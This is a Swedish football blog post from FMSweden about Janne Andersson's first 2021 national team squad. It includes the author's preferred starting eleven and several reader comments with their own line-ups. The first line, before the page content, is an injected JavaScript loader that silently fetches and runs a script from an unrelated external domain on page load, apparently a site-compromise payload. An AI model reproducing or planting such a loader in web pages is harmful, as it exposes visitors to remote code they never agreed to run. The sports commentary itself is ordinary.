;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Fabbes blogg: Det våras för landslagsfotbollen – FMSweden
Meny Stäng

Fabbes blogg: Det våras för landslagsfotbollen

Vår i luften, årets första landslagstrupp och ett stundande mästerskap. Nu börjar landslagsfotbollen bli rolig igen.

Efter höstens, ursäkta uttrycket, pisstråkiga Nations League tog Janne Andersson igår ut 2021:s första landslagstrupp. VM-kvalet ska inledas och vi ska äntligen få se matcher som verkligen betyder något igen. Inga matcher där det ska testas nya formationer, spelsätt eller byggas relationer.

Men en hel del är ganska nytt och oklart ändå. Nej, jag tänker inte viga ett inlägg åt Zlatan, det får någon annan göra. Istället är jag mer spänd på övriga spelar i truppen. Jesper Karlsson är med efter en succéfylld säsong i Nederländerna och i min mening så ska han vara given i en landslagstrupp. Precis som vår Keven Bader har bloggat om flertalet gånger så fanns det heller inget annat alternativ än att Joakim Nilsson skulle få chansen i truppen. Mittbacken, som i fjol blev utsedd till 2. Bundesligas bästa, har övertygat även på högsta nivå under våren. I min mening borde han till och med vara aktuell för en startplats, och det säger jag inte enbart för att min första padelmatch någonsin var mot just Jocke.

Offensivt har Janne nu ett smärre helvete att hålla alla spelare nöjda. Att gissa och få ihop en startelva känns ovisare än någonsin, och då är det framförallt mittfältet och anfallet där konkurrensen är mördande. Jag har svårt att se att Janne håller en spelare som Victor Claesson utanför startelvan, vilket i sådana fall med största sannolikhet är på bekostnad av Dejan Kulusevski. Och att hålla en spelare, som är en startspelare i Juventus, utanför elvan är inte det enklaste beslutet. Här avundas jag verkligen inte vår förbundskapten, men litar fullt ut på att han tar rätt beslut.

——————————

Hur hade då jag formerat en startelva, om jag fick bestämma helt fritt? Nedan har ni svaret:

Robin Olsen – Micke Lustig, Victor Nilsson Lindelöf, Joakim Nilsson, Ludwig Augustinsson – Victor Claesson, Albin Ekdal, Kristoffer Olsson, Emil Forsberg – Zlatan Ibrahimovic, Marcus Berg

Motivering: Målvakt och backlinje är för mig given. Men Janne kommer med största sannolikhet ha både Marcus Danielsson, Pontus Jansson och kanske även Filip Helander före Joakim Nilsson. Mittfältet väljer jag Claesson då jag tycker om hans spelstil, men hade lika gärna kunnat gå för Kulusevski. Centralt tror jag Janne står och väljer mellan Olsson och Sebastian Larsson, men min lott faller på Olsson.

Anfallsmässigt så tycker jag Berg är för viktig för att inte ha på plan. Speciellt med tanke på att Zlatan inte kommer vara allt för intresserad av att ta Bergs roll fullt ut när det kommer till presspelet. Det gör att spelare som Quaison och Isak får finna sig med att vara avbytare. Här hade ju också varit en möjlighet att spela Claesson/Kulusevski för att få plats med båda. Men vill Janne verkligen offra Berg? Tror inte det.

Så här kommer elvan säkert inte se ut, och det är det jag ser fram emot mest den här samlingen. Hur tänker Janne?

 

Kommentera gärna hur er elva hade sett ut. 

 

Ciao.

Please wait...

Liknande Inlägg

4 kommentarer

 1. Peter Hecktor

  Intressant, tycker dock att man ska göra allt i sin makt att få in både Kulusevski och Isak i en startelva men det är som du säger, väldigt svårt!

  Min elva:

  Olsen
  Lustig Lindelöf Starfelt Augustinsson
  Kulusevski Olsson Ekdal Forsberg
  Ibrahimovic Berg

 2. Daniel Nilsson

  Johnsson
  Lustig – Lindelöf – Starfelt – Augustinsson
  Ekdal – Olsson
  Kulusevski – Zlatan – Forsberg
  Berg

  Den såg ni inte komma, va? Olsen på BÄNKEN. Isak bänken pga Zlatans intåg annars hade han fått vara längst framme men för mig går Berg före och sen med ungefär en tredjedel kvar av matchen kommer springpojken in och gör ett par baljor.

 3. raca14

  Måste nog hålla Fabbes elva som närmast till min egna elva.

  Olsen
  Lustig, Nilsson Lindelöf, Nilsson, Augustinsson
  Claesson, Ekdal, Olsson, Forsberg
  Ibrahimovic, Kulusevski

  Motiveringar:
  Olsen är given trots mindre speltid i klubblaget än Johnsson, trots allt visat vid varje tillfälle i landslaget att han är att lita på, samtidigt som han är min gamla adept sedan tiden i FC Malmö som undomsspelare.
  Lustig, given. VNL, mer än given. Nilsson, inga ord behövs, både Keven och Fabbe har talat, men hade lika gärna kunnat slänga in en frisk Ponne där istället. Augustinsson, ser ingen annan vänsterback som kan utmana på riktigt.
  Claesson, stark i det mesta, Olsson har visat gång på gång vad han kan utföra med rätt spelare omkring sig, Ekdal skulle väl vara det “osäkra” kortet med skadehistoriken, men hel och i form, ja, då kan han dominera i nästan vilken match som helst i blågult, Forsberg är Forsberg, honom flyttar man inte på i första taget.
  Zlatan, behövs nog ingen motivering, och till sist Kulusevski som ett bra komplement för att göra grovjobbet sidan om Zlatan.

  Spelare som enligt mig lika gärna hade kunnat få ta plats i en startelva är Ponne, Svanberg, Isak och Quaison.

  Oavsett vad, så kommer det bli väldigt intressant hur Janne ska hantera denna situation med alla dessa killar som gör det bra i sina klubblag för tillfället. Tror inte jag varit med om en starkare trupp under min livstid.

Lämna ett svar